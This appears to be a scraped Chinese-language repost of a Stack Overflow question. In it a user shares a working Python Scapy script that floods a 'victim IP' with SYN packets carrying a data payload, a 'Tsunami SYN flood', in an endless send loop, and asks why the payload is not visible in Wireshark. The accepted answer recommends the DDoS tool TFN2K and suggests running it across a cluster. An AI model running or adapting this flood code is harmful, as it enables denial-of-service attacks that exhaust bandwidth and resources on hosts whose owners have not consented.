gpt4 book ai didi

python - 使用 Scapy 制作数据包时,我在 Wireshark 中看不到我的有效负载

转载 作者:可可西里 更新时间:2023-11-01 02:43:32 24 4
gpt4 key购买 nike

我正在编写一小段代码来为我正在进行的项目创建一个 Tsunami SYN 泛洪数据包。Tsunami SYN 泛洪与普通 SYN 泛洪的不同之处在于数据包包含数据,这意味着链接带宽以及受害计算机上的资源都已耗尽。

我想我已经成功地向我的数据包添加了一个数据负载,它在我运行代码时显示出来,但是当我在 Wireshark 上查看数据包时,我似乎看不到数据。我很可能遗漏了一些非常明显的东西,但我将不胜感激,这对我来说都是新的。

#type sudo, command then follow with victim IP address
import sys
from scapy.all import *
iterationCount = 0
f=IP(dst=sys.argv[1], ttl=50)
t=TCP(sport=RandShort(),dport=[80], window=1000, flags="S")
payload="Here is my payload I want it to be longer than this but this is just for testing purposes"
packet=f/t/payload
print "Flood packet info"
packet.show()
print "sending packets"
while (1 == 1):
send(packet, verbose=0) #sends packet and supresses 1 packet sent message
iterationCount = iterationCount + 1
print(str(iterationCount) + " Packets Sent")

最佳答案

为什么要重新发明轮子?使用 tfnk2(可以选择数据包大小)使用 mpich 运行 tfnk2或者搭建集群并运行tfnk2

关于python - 使用 Scapy 制作数据包时,我在 Wireshark 中看不到我的有效负载,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/31750044/

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com